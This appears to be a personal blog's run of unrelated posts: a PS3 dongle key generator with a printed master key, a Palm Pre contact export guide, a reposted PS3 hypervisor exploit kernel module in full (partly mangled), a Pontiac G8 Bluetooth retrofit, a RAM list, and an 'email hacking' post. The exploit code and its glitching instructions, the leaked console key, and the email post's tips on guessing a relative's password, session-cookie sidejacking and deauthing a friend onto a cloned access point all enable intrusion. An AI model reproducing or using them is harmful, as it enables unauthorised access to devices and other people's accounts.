X3MAX PS3 GIF – is not a fake afterall XTSE Creates PS3 Dongle ID Key Generator

I downloaded the compiled version of p3kgwn to see if if there was any meaning to X3 claim. You all remember that GIF image that everyone said was fake and no one could make sense of it. Well more progress has been made to the ps3 scene and I thought I’d help validate X3max. Thanks go out to Graf_Chokolo + Xtse for either work.

Below is the image and how to use the little app. It appears to be accurate. If you keep reading you will see why this is important.

X3 image deciphered
————–> IMAGE WAS TAKEN FROM X3MAX.COM

Originally Posted by Estx
Well, the master key is out and about now so here’s a convenient little application to generate your dongle id keys.

Straight forward to use.

p3kg – Xtse WINDOWS 2.0 Net Version

Code:
p3kgwn.exe 0xAAAB

Replacing 0xAAAB with whatever device ID you like. http://www.mediafire.com/?oi8yaop8njrmi2n
– download link for now

AFTER I TESTED THE APP IT TURNS OUT TO GIVE THE SAME RESULTS AS X3 CLAIMED.

C:\Users\Jeff\Desktop>p3kgwn 0x3BAD
p3kg (Windows .NET) – Xtse

Master Key
46 DC EA D3 17 FE 45 D8 09 23 EB 97 E4 95 64 10 D4 CD B2 C2

Device ID
3B AD

Device Key
2A 41 C2 93 F8 15 D8 91 65 6D C3 74 6D 0E 33 EC 7B 39 5B 92

Convientient JAVASCRIPT VERSION has been made http://www.teknoconsolas.es/usbdongle/usbdongle.html

Advertisements

Exporting Contacts from Palm Pre to HTC EVO

I just gave up on the Palm Pre. I got the HTV EVO for under 100 bucks after the tradein of my palm pre and walmart 100 gift card.
Keep in mind I missed the 99 dollar deal from Amazon.com for the HTC EVO.
My first goal to prep the transition is to get my contacts fully exported and imported.
I found this post and well so far so good.

This is how to get you contacts from your Sprint Palm PRE. You can create a .vcf file to import into most email programs.
• Open phone dialer on PRE or Pixi
• Type ##66623#
• Click on Export
• This creates the export file (.vcf)….The more contacts you have the longer it takes
• Connect your USB cable to the computer and also to the PRE when it prompts you too.
• Click on the USB Drive on your pre to mount to computer
• Once mounted on your computer, open windows explorer and the Palm PRE
• Find the folder called temp and open it (if you don’t find a temp folder, open folder options/view/and choose show hidden files/ then OK)
• You will find a file called PmMigration (this is the vcf file)
• Drag to your documents folder on your computer (PRE Backup folder) if you have one
• Use this file to import your contacts into Gmail, Yahoo, Hotmail or Outlook
• When you’re done Eject your Palm pre or safely remove hardware and then disconnect pre
• Your done….

Getting them to Gmail.
Follow the instructions in the above, and create the VCF file. Save it somewhere that it can easily be found. Go to Gmail and click on contacts, then in the upper right click on import. Import your VCF file. If it works it will tell you how many contacts it imported.

Once I got them to Gmail, it was wasy to get them to outlook as Gmail has a direct link to transfer contacts to outlook.

To make this transfer use this link.
http://office.microsoft.com/en-us/outlook-help/transfer-contacts-between-outlook-and-google-gmail-HA010222048.aspx

Hope this works for all of you. This was the only way I was able to get it all to work, and from what I can tell all the contact info went through, including addresses, email and phone numbers.


Thank you for your time,
Heidi Mercer

“I do believe I am making an impact. I know that cancer’s worst enemy is money. It is money that will pay for research. It is money that will provide services for cancer patients. It is money that will eventually find a cure and end the suffering. What I like about Relay is that we raise thousands of dollars, one dollar at a time. If you have a dollar you can fight cancer. There’s nothing greater than that.” M.Starr

“When you think about it, what other choice is there but to hope? We have two options, medically and emotionally: give up, or Fight Like Hell.”
Lance Armstrong

Geohot’s PS3 exploit released 1.26.2010 PS3 HACKED

Geohot’s PS3 Exploit released for download

Geohot has released the exploit that will allow for the PS3 to be hacked. This is what the hacking community have been waiting for. Geohot’s PS3 exploit will have the console hacking scene raving in hours. This is not for the average user only experienced hackers will be comfortable with this code.

[Quote]

“In the interest of openness, I’ve decided to release the exploit. Hopefully, this will ignite the PS3 scene, and you will organize and figure out how to use this to do practical things, like the iPhone when jailbreaks were first released. I have a life to get back to and can’t keep working on this all day and night.

Please document your findings on the psDevWiki. They have been a great resource so far, and with the power this exploit gives, opens tons of new stuff to document. I’d like to see the missing HV calls filled in, nice memory maps, the boot chain better documented, and progress on a 3D GPU driver. And of course, the search for a software exploit.

This is the coveted PS3 exploit, gives full memory access and therefore ring 0 access from OtherOS. Enjoy your hypervisor dumps. This is known to work with version 2.4.2 only, but I imagine it works on all current versions. Maybe later I’ll write up how it works

Good luck!”

Download Geohot’s PS3 exploit
http://geohotps3.blogspot.com/2010/01/heres-your-silver-platter.html

Download Geohot’s ps3 exploit in zip format

there are 5 files contained in the zip file, two of which are just instruction’s in the form of a picture and .txt file.

the following are a list of files in the .zip folder

1.pokemehere.jpg
2.run.sh
3.exploit.c
4.makefile
5.instructions.txt

INSTRUCTIONS.TXT includes:
!!EXPLOIT IS FOR RESEARCH PURPOSES ONLY!!

Usage Instructions:

Compile and run the kernel module.

When the “PRESS THE BUTTON IN THE MIDDLE OF THIS” comes on, pulse the line circled in the picture low for ~40ns.
Try this multiple times, I rigged an FPGA button to send the pulse.
Sometimes it kernel panics, sometimes it lv1 panics, but sometimes you get the exploit!!
If the module exits, you are now exploited.

This adds two new HV calls,
u64 lv1_peek(16)(u64 address)
void lv1_poke(20)(u64 address, u64 data)
which allow any access to real memory.

The PS3 is hacked, its your job to figure out something useful to do with it.

http://geohotps3.blogspot.com/

exploit.c
// PS3 exploit code
// c2010 geohot
// I DO NOT CONDONE PIRACY, EXPLOIT IS FOR RESEARCH USE ONLY

#include
#include
#include
#include
#include

#include
#include
#include
#include
#include
#include

#include
#include
#include
#include
#include
#include

#include
#include
#include
#include

#include

void hexdump(unsigned long *d, int l) {
int i;
for(i=0;i>12)&0xFFFFFFFFF;
}

#define LENGTH 0x1000000
#define COUNT 0x40

volatile unsigned long cache_clear[0x100000];

volatile int exploit_first_stage() {
unsigned long lpar, lpar2, crap, g1, glitch=0, status, i;
printk(KERN_ERR “allocate memory: %d\n”, lv1_allocate_memory(0x100000, 0x14, 0, 0, &lpar, &crap));
printk(KERN_ERR “PRESS THE BUTTON IN THE MIDDLE OF THIS\n”);

for(i=0;i<0x10000;i++) {
g1 = ((unsigned long*)0xD000080080000000)[i*2];
if( (g1 & 1) == 0 || (g1&0xFFFFFFFF00000000) == 0x0000FFFF00000000) {
// isn't valid or is previous crap
if(lv1_write_htab_entry(0,i,0x0000FFFF00000001|(i<<16) | ((((((i/8)^(((0x0000FFFF00000001|(i<>12) & 0x1FFF)) <>23)&0x1F)<<7) ,0x196|lpar) != 0) {
printk(KERN_ERR "bad HTAB write @ %X\n", i);
}
glitch++;
}
}
printk(KERN_ERR "added 0x%X HTAB entries\n", glitch);

volatile register unsigned long j, t1, t2, k, l;

//****************KERNEL CHILL TIME BEGIN****************
unsigned long irq, irq1, flags = 0, stack;
irq = __pa(get_irq_chip_data(20));
irq1 = __pa(get_irq_chip_data(16));
spinlock_t mr_lock = SPIN_LOCK_UNLOCKED;
spin_lock_irqsave(&mr_lock, flags);
preempt_disable();
lock_kernel();
hard_irq_disable();
lv1_configure_irq_state_bitmap(1,0,0);
lv1_configure_irq_state_bitmap(1,1,0);
//****************KERNEL CHILL TIME BEGIN****************

// get craps in the icache
lv1_allocate_memory(0x1000, 0xC, 0, 0, &lpar2, &crap);
lv1_release_memory(lpar2);

for(j=0;j<LENGTH;j++) {
if(j==(LENGTH/2)) {
t1 = mftb();
status = lv1_release_memory(lpar);
t2 = mftb();
memset(cache_clear, 0xAA, 0x100000);
}
}

//****************KERNEL CHILL TIME END****************
lv1_configure_irq_state_bitmap(1,1,irq1);
lv1_configure_irq_state_bitmap(1,0,irq);
__hard_irq_enable();
unlock_kernel();
preempt_enable();
spin_unlock_irqrestore(&mr_lock, flags);
//****************KERNEL CHILL TIME END****************

printk(KERN_ERR "time was 0x%lx, 0x%x per, %d\n", t2-t1, (t2-t1)/glitch, status);

t1 = 0;
t2 = 0;

for(i=0;i0) {
printk(KERN_ERR “EXPLOIT ENTRY FOUND!!!!!\n”);
return 0;
}

return -1;
}

unsigned long SLB[128];

// 64 entries in the SLB
inline int read_slb() {
unsigned long i, j;
unsigned long *entry;
for(i=0;i<64;i++) {
entry = &SLB[i*2];
__asm__ volatile("slbmfee 3, %0\n"
"std 3, 0(%1)\n"
"slbmfev 3, %0\n"
"std 3, 8(%1)\n"
:
: "r" (i), "r" (entry)
: "r3");
}
return 0;
}

// move into another virtual address space

unsigned long HTAB_0[0x20000];
unsigned long HTAB_1[0x20000];

volatile long hypercall_in_c() {
return 0x8FFFFFFEF;
}

volatile long call_hypercall_tlbia(unsigned long* r4) {
unsigned long ret;
unsigned long inr4 = *r4, outr4;
asm volatile("mr 3, %2\n"
"li 11, 16\n"
"sc 1\n"
"mr %0, 3\n"
"mr %1, 4\n"
: "=r" (ret), "=r" (outr4)
: "r" (inr4)
: "r3", "r4", "r5", "r6", "r7", "r8", "r9", "r10", "r11", "r12" );
*r4 = outr4;
return ret;
}

volatile int exploit_second_stage() {
unsigned long crap, j, slb1, slb2, msr, hsprg0;
unsigned long i, g1, g2, status, raff_ptr;
unsigned long vas_id, old_vas_id;
unsigned long act_htab_size;
//2, (24<<56)|(16<<48)
printk(KERN_ERR "construct address space: %d\n", lv1_construct_virtual_address_space(20, 2, 0x1814000000000000, &vas_id, &act_htab_size));
lv1_get_virtual_address_space_id_of_ppe(0, &old_vas_id);
printk(KERN_ERR "address space is %d, old was %d\n", vas_id, old_vas_id);
if(vas_id == 0) {
printk(KERN_ERR "ADDRESS SPACE FAIL\n");
return 0;
}

read_slb();
for(i=0;i>27)&1) {
printk(KERN_ERR “%lx %lx\n”, SLB[i*2]&0xFFFFFFFFF0000000, SLB[(i*2)+1]>>12);
}
}
//hexdump(SLB, 128);

unsigned long htab_lpar;
lv1_map_htab(0, &htab_lpar);
unsigned long htab_ra = get_real_address_from_lpar(htab_lpar);

unsigned long other_htab_lpar;
lv1_map_htab(vas_id, &other_htab_lpar);
unsigned long* other_htab = __ioremap(other_htab_lpar, 0x100000, 3);
unsigned long other_htab_ra = get_real_address_from_lpar(other_htab_lpar);

printk(KERN_ERR “fix values are %lx %lx\n”, other_htab_lpar, vas_id);

// add the messed up one
for(raff_ptr=0;raff_ptr>12) == 0x400) ) {
printk(KERN_ERR “FOUND ENTRY %16.16lx %16.16lx @ %X\n”, g1, g2, raff_ptr);
break;
}
}
if(raff_ptr==0x10000) {
printk(KERN_ERR “EXPLOIT NOT FOUND\n”);
goto hard_die;
}

if(other_htab_ra != ((g2&0xFFFF000)>>12) ) {
printk(KERN_ERR “BAD ADDRESS OF REGIONS HTAB\n”);
goto die;
}

// add the segment
crap = 0x5000000000000000;
__asm__ volatile(“slbie %0\n”
:
: “r” (crap) );

read_slb();
for(j=0;j>27)&1) == 0) {
break;
}
}
// j is first SLB I can use
slb1 = 0x5000000008000000|j;
//slb2 = 0x0000FFFF00000400|(raff_ptr<>12) & 0x1FFF)) <>2)&1)?24:12);
printk(KERN_ERR “computed VA is %lx\n”, va);

unsigned long* other_htab_rw = va;
other_htab_rw[0] = 0x0000FFFF00000001;
other_htab_rw[1] = 0x0000000000000196|(htab_ra< %lx\n”, usb1_ra);
printk(KERN_ERR “0x4000001e0000 -> %lx\n”, usb2_ra);
printk(KERN_ERR “0x4000001f0000 -> %lx\n”, usb3_ra);
printk(KERN_ERR “0x400000200000 -> %lx\n”, usb4_ra);

// skip first entry, it’s mine and important
for(i=1;i<0x10000;i++) {
g1 = ((unsigned long*)0xD000080080000000)[i*2];
g2 = ((unsigned long*)0xD000080080000000)[(i*2)+1];
if(g1&1) {
unsigned long va = 0xFFFFFFFFFFFFFFFF, ra;
for(j=0;j>27)&1) {
if((SLB[(j*2)+1]>>12) == (g1>>12)) {
va = SLB[j*2]&0xFFFFFFFFF0000000;
}
}
}
if(va == 0xFFFFFFFFFFFFFFFF) {
continue;
//printk(KERN_ERR “ENTRY NOT FOUND IN SLB: %lx\n”, (g1>>12));
}
valid_count++;

va |= ((i/8)^((g1>>(7+5)) & 0x1FFF)) <>2)&1)?24:12);
ra = g2 >> 12;

my_lpar = 0xFFFFFFFFFFFFFFFF;

if( ra >= 0x1000 && ra = 0x8000 ) {
my_lpar = (ra-0x8000) << 12;
} else {
my_lpar = 0x6c0058000000 | ((ra-0x1000)<<12);
}
} else if( (ra&0xFFFFFFFFFFFFFF00) == htab_ra) {
my_lpar = htab_lpar + ((ra-htab_ra) << 12);
} else if( (ra&0xFFFFFFFFFFFFFF00) == other_htab_ra) {
my_lpar = other_htab_lpar + ((ra-other_htab_ra) <= 0x28000080 && ra %lx\n”, i, g1, g2, va, ra);
}

if(other_htab[i*2] != g1 || other_htab[(i*2)+1] != g2) {
printk(KERN_ERR “verify failed on %X\n”, i);
printk(KERN_ERR “%lx %lx — %lx %lx\n”, g1, g2, other_htab[i*2], other_htab[(i*2)+1]);
//goto home;
}
}
}

printk(KERN_ERR “wrote 0x%X/0x%X htab entries\n”, count, valid_count);

hexdump(other_htab, 4);
printk(KERN_ERR “OOO R/W\n”);
hexdump(other_htab_rw, 4);

// add the segment different
crap = 0x5000000000000000;
__asm__ volatile(“slbie %0\n”
:
: “r” (crap) );

read_slb();
for(j=0;j>27)&1) == 0) {
break;
}
}
// j is first SLB I can use
slb1 = 0x5000000008000000|j;
slb2 = 0x0000FFFF00000400;
__asm__ volatile(“slbmte %0, %1\n”
:
: “r” (slb2), “r” (slb1) );

printk(KERN_ERR “GOING UNDERCOVER\n”);

//****************KERNEL CHILL TIME BEGIN****************
unsigned long irq, irq1, flags = 0;
irq = __pa(get_irq_chip_data(20));
irq1 = __pa(get_irq_chip_data(16));
spinlock_t mr_lock = SPIN_LOCK_UNLOCKED;
spin_lock_irqsave(&mr_lock, flags);
preempt_disable();
lock_kernel();
hard_irq_disable();
lv1_configure_irq_state_bitmap(1,0,0);
lv1_configure_irq_state_bitmap(1,1,0);
//****************KERNEL CHILL TIME BEGIN****************

status = lv1_select_virtual_address_space(vas_id);

// OMG, CRAZY, IN OTHER SPACE
unsigned long* htab_rw = 0x5000000000000000;
// middle part is 0 cause in position 0

// add htab r/w to itself
htab_rw[2] = 0x0000FFFF00000005;
htab_rw[3] = 0x0000000000000196;

lv1_select_virtual_address_space(old_vas_id);
//****************KERNEL CHILL TIME END****************
lv1_configure_irq_state_bitmap(1,1,irq1);
lv1_configure_irq_state_bitmap(1,0,irq);
__hard_irq_enable();
unlock_kernel();
preempt_enable();
spin_unlock_irqrestore(&mr_lock, flags);
//****************KERNEL CHILL TIME END****************

printk(KERN_ERR “prease i lived?!?!?: %d\n”, status);

// add the segment different again
crap = 0x5000000000000000;
__asm__ volatile(“slbie %0\n”
:
: “r” (crap) );

read_slb();
for(j=0;j>27)&1) == 0) {
break;
}
}
// j is first SLB I can use
slb1 = 0x5000000008000000|j;
slb2 = 0x0000FFFF00000500;
__asm__ volatile(“slbmte %0, %1\n”
:
: “r” (slb2), “r” (slb1) );

home:
printk(KERN_ERR “unmap other HTAB: %d\n”, lv1_unmap_htab(other_htab_lpar));
printk(KERN_ERR “destruct address space: %d\n”, lv1_destruct_virtual_address_space(vas_id));

hexdump(0xD000080080000000, 0x10);

return 0;
die:
printk(KERN_ERR “unmap other HTAB: %d\n”, lv1_unmap_htab(other_htab_lpar));
printk(KERN_ERR “destruct address space: %d\n”, lv1_destruct_virtual_address_space(vas_id));
return -1;
hard_die:
printk(KERN_ERR “unmap other HTAB: %d\n”, lv1_unmap_htab(other_htab_lpar));
printk(KERN_ERR “destruct address space: %d\n”, lv1_destruct_virtual_address_space(vas_id));
return -2;
}

void add_segment() {
// add the segment different again
unsigned long crap, j, slb1, slb2;
crap = 0x5000000000000000;
__asm__ volatile(“slbie %0\n”
:
: “r” (crap) );

read_slb();
for(j=0;j>27)&1) == 0) {
break;
}
}
// j is first SLB I can use
slb1 = 0x5000000008000000|j;
slb2 = 0x0000FFFF00000500;
__asm__ volatile(“slbmte %0, %1\n”
:
: “r” (slb2), “r” (slb1) );
}

volatile long lv1_peek(unsigned long real_addr) {
unsigned long ret;
asm volatile(“mr 3, %1\n”
“li 11, 16\n”
“sc 1\n”
“mr %0, 3\n”
: “=r” (ret)
: “r” (real_addr)
: “r3”, “r4”, “r5”, “r6”, “r7”, “r8”, “r9”, “r10”, “r11”, “r12”);
return ret;
}

volatile long lv1_poke(unsigned long real_addr, unsigned long data) {
unsigned long ret;
asm volatile(“mr 4, %2\n”
“mr 3, %1\n”
“li 11, 20\n”
“sc 1\n”
“mr %0, 3\n”
: “=r” (ret)
: “r” (real_addr), “r” (data)
: “r3”, “r4”, “r5”, “r6”, “r7”, “r8”, “r9”, “r10”, “r11”, “r12”);
return ret;
}

void install_hypercall() {
unsigned long lpar, crap;

hexdump(0xD000080080000000, 0x10);

if( *((unsigned long *)0xD000080080000010) != 0x0000FFFF00000005 ||
*((unsigned long *)0xD000080080000018) != 0x0000000000000196) {
printk(KERN_ERR “killer entry NOT present\n”);
return 0;
}

printk(KERN_ERR “allocate memory: %d\n”, lv1_allocate_memory(0x1000, 0xC, 0, 0, &lpar, &crap));
unsigned long* hypercall_in_zero_page = __ioremap(lpar, 0x1000, PAGE_SHARED_X);

hypercall_in_zero_page[0] = 0xE86300004E800020;
hypercall_in_zero_page[1] = 0xF883000038600000;
hypercall_in_zero_page[2] = 0x4E80002000000000;

unsigned long real_address = get_real_address_from_lpar(lpar)<<12;

add_segment();
unsigned long* hv_call_table = 0x500000000037C598;
hv_call_table[16] = real_address;
hv_call_table[20] = real_address+0x8;
printk(KERN_ERR "calling hypercall test got %16.16lx\n", lv1_peek(0x2401FC00000));
}

volatile int init_module() {
if( *((unsigned long *)0xD000080080000010) != 0x0000FFFF00000005 ||
*((unsigned long *)0xD000080080000018) != 0x0000000000000196) {
while(exploit_first_stage() == -1);
while(exploit_second_stage() == -1);
}
install_hypercall();
return 0;
}

void cleanup_module(void) {
printk(KERN_ERR "cleanup_module() called\n");
}

~geohot

Pontiac G8 GT 2009 Bluetooth Addition OEM Install

If you have come accross this blog then you are in the same boat as me. You have purchased the 2009 G8 GT and realized that you do not have the Bluetooth that you were hoping for. There has been some breakthrough recently and I have compiled tons of data to help those of you in need of help.  I have asked 3 important questions and here are my findings. G8 community is great for information.

Resource link- http://www.g8board.com/forums/showpost.php?p=404735&postcount=202
Chris – AKA GTPprix runs the site www.whiteautoandmedia.com and he can preform the flash if you find a BT box. You would ship your unit to Chris and he will flash it and send it back.

http://www.whiteautoandmedia.com/index.php?page=shop.browse&category_id=27&option=com_virtuemart&Itemid=54

The Three Questions that I asked are:

Q. How is the quality of the BT in the car. Can the other person tell you are on BT? I know that the ford sync bt is crap when it calls to a landline at work.
A. So far everyone has been raving that the sound is great!  Quotes: The BT quality, in my opinion, is excellent. I can hear the caller perfectly (sometimes it takes adjusting the volume), and whenever I tell someone “by the way, you’re on speaker”, they respond with “oh, it doesn’t seem like it”. The quality of your cell connection is what matters – a poor connection obviously yields poor results.

Q. What vehicles can i search for that have the two modules that work? GM Part # 25984444 and its supersedent 20783877 these are the ONLY two modules. It was to be believe 25984444 is the original part they used when they first introduced the Bluetooth option. It is no longer available. 20783877 is the updated part that has some software revisions to help it be more compatible with vehicles that have the factory in dash navigation systems. The original module made some of the navigation features not function. If you turn up the results when calling a junk yard  “Communication, OnStar (opt UEl), (left side of dash)“, or “Communication, (left 1/4 wheelhouse)” Both have ID 25984444. Do not despare the descriptions are just the placements on different vehicles you should have no problems with either. * Don’t blame me if they don’t.
A. 2009 Model Year Arcadia\Enclave\Outlook\Traverse/Sierra\Silverado\Tahoe\Suburban\Yukon
Results from the forums are “Ok, I did some experimenting, bought a GM p/n #25984444 from a different vehicle (09 Buick Acadia, I called around to local junkyards), bought the Bluetooth antenna from the dealer ($40)”

Q. What is the Bluetooth Antenna that is needed?
A. Part Number 15938939 is a 1″ x 1/2″ plug in bluetooth antenna that goes right onto the Onstar box. It is not the roof antenna or anything else. It is very small and fragile.

GM PART # 15938939 – GMPARTSDIRECT.com
CATEGORY: Power Radio Antenna Module
PACK QTY: 1
CORE CHARGE: $0.00
GM LIST: $39.02
OUR PRICE: $23.13

Q. What did you pay for your 25984444.
A. Junkyard charged $120 for the module 20783877 . Junkyard wanted 310 for 25984444. Your Milage my vary.

Q. Has anyone taken install pics of the new unit and the antenna etc?
A. Working on getting someone to post these. Or i will take images when i get retro fitted.
http://www.g8board.com/forums/showpost.php?p=245182&postcount=59
Images… I will post here as a mirror.

Q. Does your Onstar # change?
A. Mine actually changed twice, once during setup and once sometime between setup and now. What is ironic is that my original, stock # was a 203 area code, and the updated 2 numbers are 860 area codes (those are CT’s two major codes, they recently added more).

Q. Do you still get the Onstar emails that come monthly.
A. The Onstar emails still come monthly. The month that I did the swap, it came a little late (I imagine they redid the cycle in their system or something). I get the warning “action suggested” on my engine & transmission system and the emissions system, but GTPPrix described a possible fix for this somewhere that I have yet to try.

Disclamer: Regarding finding a box – those who find them are either lucky or clever. Many junkyards, especially smaller ones, don’t carefully inventory all of the boxes they get. They simply label them “computer module”, and some even toss them because they can be a lot of trouble to match up with exact software revisions and date codes. Also, remember that many people entering the parts into the database may not be the brightest bulbs on the planet, so they are prone to put in incorrect part numbers or even omit information. My advice on this is to find all of the yards you can with any 09 vehicle with the box and have them actually look at the car or parts to find it. These have to still exist out there; not everyone in an 09GM is a good and lucky driver

EVGA 750i FTW approved Memory List

780i/750iFTW/680i Series Memory Support

SLI Ready Memory

Above 1066 MHz(Above PC2 8500)
Corsair TWIN2X2048-10000C5DF
Corsair TWIN2X2048-9136C5DF
Corsair TWIN2X2048-8888C4DF

1066 MHz(PC2 8500)
OCZ OCZ2N10662GK
OCZ OCZ2N10661G
Corsair TWIN2X2048-8500C5D
Corsair TWIN2X2048-8500C5
Kingston KHX8500D2K2/1G
OCZ OCZ2N1066SR2GK
OCZ OCZ2N1066SR1G
PNY D22GX85GMR

900 MHz(PC2 7200)
OCZ OCZ2N900SR2GK
OCZ OCZ2N900SR1G
OCZ OCZ2N9002GK
OCZ OCZ2N9001G

800 MHz(PC2 6400)
Corsair TWIN2X2048-6400C3DF
Corsair TWIN2X2048-6400C4D
Crucial BL2KIT12864AL804
Crucial BL12864AL804
Crucial BL2KIT12864AA804
Crucial BL2KIT6464AA804
Crucial BL12864AA804
Crucial BL6464AA804
Kingston KHX6400D2LLK2/2GN
Kingston KHX6400D2LLK2/1GN
Patriot PDC22G6400LLK
PNY D22GX64GMR-4

Standard Memory

Above 800 MHz(Above PC2 6400)
Kingston KHX9600D2K2/2G
Kingston KHX9200D2/512
Kingston KHX8000D2K2/2G
Kingston KHX7200D2K2/2G
Patriot PDC21G8000+XBLK
Patriot PDC21G8500 ELK
Crucial BL2KIT12864AL1005
G.SKILL F2-8000CL5D-4GBPQ
Mushkin XP2-1066

800 MHz(PC2 6400)
Mushkin XP-6400
Mushkin XP2-6400
OCZ OCZ2G8002GK
OCZ OCZ2P800R21G
OCZ OCZ2T8002GK
Corsair CGM2X1G800 G
Corsair CGM2X2G800 G
Corsair XMS6405v4.1
Corsair TWIN2X2048-6400
G.Skill F2-6400PHU2-2GBHZ
G.Skill F2-6400PHU2-2GBNR
G.SKILL F2-6400CL4D-2GBPK
G.SKILL F2-6400CL5D-4GBPQ
Team Xtreem PC2-6400 800MHz 3-3-3-8
Team Xtreem PC2-6400 800MHz 4-4-4-10
Patriot PDC22G6400ELK
Geil Ultra GX22GB6400UDC
Super Talent T800UX2GC4

667 MHz(PC2 5400)
Corsair VS512MB667D2
Buffalo D2V667C-1G/BJ
Patriot PDC21G5300LLK
PQI 5400 Turbo
Kingston KHX5400D2K2/1G
Geil GX21GB5300SX
Muskin xp2 5300 2x1gb
Mushkin HP2-5300

533 MHz(PC2 4200)
Kingston KVR533D2/512R
PQI MAB412UOE 512MB DDR2 533
OCZ DDR2 OCZ2533512V

Email hacking for 2010.

I can remember the says when i learned about brute-force hacking. It was simple, learn everything you can about your person of interest and use it to gain access to their email.

I attempted this on my brother and it worked, soon people who ask “dude can you hack someones email for me”.
Those are the old days and we have evolved and use more secure passwords with numbers and stuff…RIGHT!!!

Well after reading about Jasager and the La Fonera I’ve been following it up with some new programs that focus on Sidejacking. These tools are named Hamster and Ferret
http://erratasec.blogspot.com/2009/03/hamster-20-and-ferret-20.html
http://hamster.erratasec.com/

The concepts are amazing and are not new to someone who focuses on this stuff everyday but for me its new. Lets say someone is using your wifi spot you start to watch there sessions. We know all sessions have cookies. Well you can grab this cookie info and inject it into your own browser and view the same sites.

http://blogs.zdnet.com/Ou/?p=651

So how could you do this to your best friend who is smarter than you and has his own wpa network and wont be using some free wifi… well you use the jasager tool on the la fonera. you use something called deauth attack with tools like Aircrack-ng, which basically kicks your buddy off the wifi then he will join your fake network because you have cloned his SSID

Meet Der Jasager, the “yes man” VIDEO

http://www.viddler.com/player/1b5f260d

Once you get a fresh install on the Fonera, Jasager should be installed. Try hitting it at http://192.168.1.1:1471

I’ll have more later with my results of playing tricks locally.

I wanted to update this post and put more references to some other great resources to read.

Hak 5 forums have many people playing with the Jasager project. I suggest you read as many post before you attempt this hack.
http://hak5.org/forums/index.php?showtopic=10254&st=0&gopid=147536&#entry147536

HIR is a new website that i found with some good documentation on the Jasager installation if you are wanting to go a different route to flash.
http://www.h-i-r.net/2009/07/evil-wifi-part-1-jasagerfonera-setup.html